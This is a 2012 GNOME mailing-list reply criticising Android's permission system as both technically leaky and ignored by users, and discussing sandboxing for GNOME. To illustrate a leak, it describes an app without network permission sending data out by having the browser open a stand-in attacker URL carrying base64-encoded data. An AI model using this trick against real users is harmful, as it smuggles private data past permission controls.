On Wed, 2012-09-19 at 17:17 +0300, Elad Alfassa wrote: > Regarding sandboxing, have you considered a permission manifest for > each application like Android has?
The Android permission system is basically bullshit from both a technical *and* user experience standpoint. The reason it's bullshit technically is twofold: 1) Applications can communicate with each other without any permissions at all - so if for example you install some "Secure Notes" app that in theory doesn't have Internet access, in reality it can simply ask the browser to open http://malware.com/?data=base64here 2) The system has a huge attack surface, and it's really easy for capabilities to leak: http://news.softpedia.com/news/Android-Security-Model-Allows-Capability-Leaks-238545.shtml The reason it's bullshit from a user experience standpoint is because no one reads that stuff - they just press OK. See also: http://robert.ocallahan.org/2011/06/permissions-for-web-applications_30.html Now parts of the security model like how each application is in theory a separate security domain (allocated separate uids) etc., is quite interesting. But the permissions system is just wasting time for users installing apps. _______________________________________________ gnome-os-list mailing list [email protected] https://mail.gnome.org/mailman/listinfo/gnome-os-list
